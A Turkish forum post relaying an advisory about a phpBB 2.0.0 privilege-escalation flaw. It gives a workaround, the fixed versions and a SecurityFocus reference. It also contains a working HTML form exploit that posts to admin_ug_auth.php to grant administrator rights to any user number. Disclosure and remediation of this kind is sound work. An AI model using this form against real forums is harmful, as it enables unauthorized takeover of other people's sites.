phpBB2'de yetkisiz saldırganların yönetim haklarına sahip olmalarına izin veren bir açık keşfedildi.
Etkilenen forum'a özel bir post göndererek 'yönetici' (administrator) izinlerini istenilen kullanıcılara vermek mümkün oluyor.
örnek:
<html>
<head>
</head>
<body>
<form method="post"
action="
http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Geçici çözüm:
.htaccess kimlik tanılama kullanılarak /admin dizinine erişim kısıtlanabilir.
Çözüm:
v2.0.0 sürümünden sonrakiler bu açıktan etkilenmiyor.
Güncelleme aşağıdaki adresten yapılabilir:
phpBB Group phpBB 2.0 .0:
phpBB Group Upgrade phpBB 2.0.3
http://www.phpbb.com/downloads.php kaynak:
http://online.securityfocus.com/bid/6056 Açığı gerçekleştirme
Yerel:
Hayır
Uzaktan:
Evet
Etkilenen Sistemler
Etkilenenler:
phpBB Group phpBB 2.0.0
Etkilenmeyenler:
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3
+rep iStemiyorum .
